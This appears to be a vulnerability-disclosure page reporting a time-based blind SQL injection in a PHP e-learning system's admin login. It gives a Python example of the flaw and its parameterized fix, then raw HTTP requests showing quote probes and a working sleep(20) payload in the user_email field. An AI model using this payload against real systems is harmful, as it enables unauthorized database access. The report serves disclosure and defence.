## Description:
The user_email parameter appears to be vulnerable to time-based blind SQL injection attacks.
A single quote was submitted in the user_email parameter, and a general error message was returned.
Two single quotes were then submitted and the error message disappeared.
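
The quote test described above, reproduced as an added example (not code from the application or from the reporter): SQLite in Python stands in for the PHP/MySQLi login, and the table, column and function names are assumptions. It shows why one quote produces a SQL error and two do not when input is concatenated into the statement, and that a bound parameter treats both as plain data.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the application's account table (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (user_email TEXT, user_pass TEXT)")
    # A legitimate address that happens to contain a quote (constructed sample).
    db.execute("INSERT INTO accounts VALUES (?, ?)",
               ("o'brien@example.test", "constructed-hash"))
    return db

def login_concatenated(db, email, pass_hash):
    # Vulnerable pattern: the input becomes part of the SQL text, so a quote
    # in it changes where the string literal ends.
    sql = ("SELECT COUNT(*) FROM accounts WHERE user_email = '" + email +
           "' AND user_pass = '" + pass_hash + "'")
    try:
        return "ok" if db.execute(sql).fetchone()[0] else "denied"
    except sqlite3.Error:
        # The statement no longer parses: the condition behind the
        # fatal error shown in Response-1.
        return "sql-error"

def login_parameterized(db, email, pass_hash):
    # Hardened pattern: the SQL text is fixed, values travel separately.
    sql = "SELECT COUNT(*) FROM accounts WHERE user_email = ? AND user_pass = ?"
    return "ok" if db.execute(sql, (email, pass_hash)).fetchone()[0] else "denied"

def quote_test():
    # Returns (input, concatenated outcome, parameterized outcome) per probe.
    db = make_db()
    probes = [
        ("a@example.test'", "x"),    # one quote: literal left unbalanced
        ("a@example.test''", "x"),   # two quotes: parsed as an escaped quote
        ("o'brien@example.test", "constructed-hash"),  # legitimate user
    ]
    return [(e, login_concatenated(db, e, p), login_parameterized(db, e, p))
            for e, p in probes]

if __name__ == "__main__":
    for row in quote_test():
        print(row)
```

The error-then-no-error pair is the signal that input reaches the SQL parser; with bound parameters that signal disappears and the user whose address contains a quote can log in.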
**Recent assessments:**
**nu11secur1ty** at October 18, 2021 2:08pm UTC reported:
## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>)
## [Vendor](<https://www.sourcecodester.com/user/51695/activity>)

## MySQL Request-1:
```
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
```

## MySQL Response-1:
```
Response 1
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...
```

* * *
## MySQL Request-2:
```
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
```

## MySQL Response-2
```
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
```

## MySQL Request-3
```
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
```

## MySQL Response-3
```
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
```

## Price for decrypting of the PoC:
4000$
## Reproduce
[href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>)
## Proof:
[href](<https://streamable.com/f5tk43>)
Assessed Attacker Value: 5